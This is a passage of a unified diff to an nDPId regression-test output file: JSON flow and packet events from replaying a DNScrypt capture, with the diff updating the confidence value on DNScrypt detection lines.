00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAXc\/csgAL0RlZgKAAABp3LcfbItAbsGBEYVm2gBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":400,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337078} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":400,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAABQ\/csAub0RumsKAAABp3LcfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAXc\/cwgAL0RlZcKAAABp3LcfejFAbsGBA+Bm2QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":402,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337078} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":402,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAABQ\/cwAub0RumoKAAABp3LcfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337078,"pkt":"REREREREZmZmZmZmCABFAAIc\/c1AAL0ReVYKAAABp3LcfbKzAbsCCEbGm2UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337078,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337078,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337078,"pkt":"ZmZmZmZmRERERERECABFAADWnoNAADURNfgzD3zQCgAAARD3laYAwhtvaUCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 
00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":946739337078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337078,"pkt":"ZmZmZmZmRERERERECABFAADWnoVAADURNfYzD3zQCgAAARD30n8Awt6UaUGBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":946739337079,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739337079,"pkt":"ZmZmZmZmRERERERECABFAADWnoRAADURNfczD3zQCgAAARD3m+YAwhUraUSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPvb\/epXmbtmpFJPDJPj0\/8kG2WLVy9aKZXG64Z\/RD4Asb+lk0fHUNVwKqjvyNJwSQDMlfv0kF+DU4Xf9AOufg1vl\/oZmXyGUvpIk2ki4WFZb2z8KlMPRm7olQdpuGdje2+X+hmZfIZSAAAAAV9TS2BfVJzg"} 
@@ -820,24 +820,24 @@ 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739337184,"pkt":"ZmZmZmZmRERERERECABFAADU4rYAADMRX7anctx9CgAAAQG7kEIAwObYm2mBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0xAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAACtvTpPmuzdARCZdHINGnm84Rta+Q9yZkJOIOBZH1xDWjyTETMesMGOqAFTeyjt37OaMFtfnU1CukJNcbLtFisLiXsfUndKvm3+Vr\/KkwQySWxBEvG+JEE+3LVi8Tb5u3eKex9Sd0q+bV9TqoVfU6qFX1T8BQ=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337184,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337184,"pkt":"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"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAXcw6sgAL0RoycKAAABBb2qxOL4AdEGBCbssn4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAW3AAwFswAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA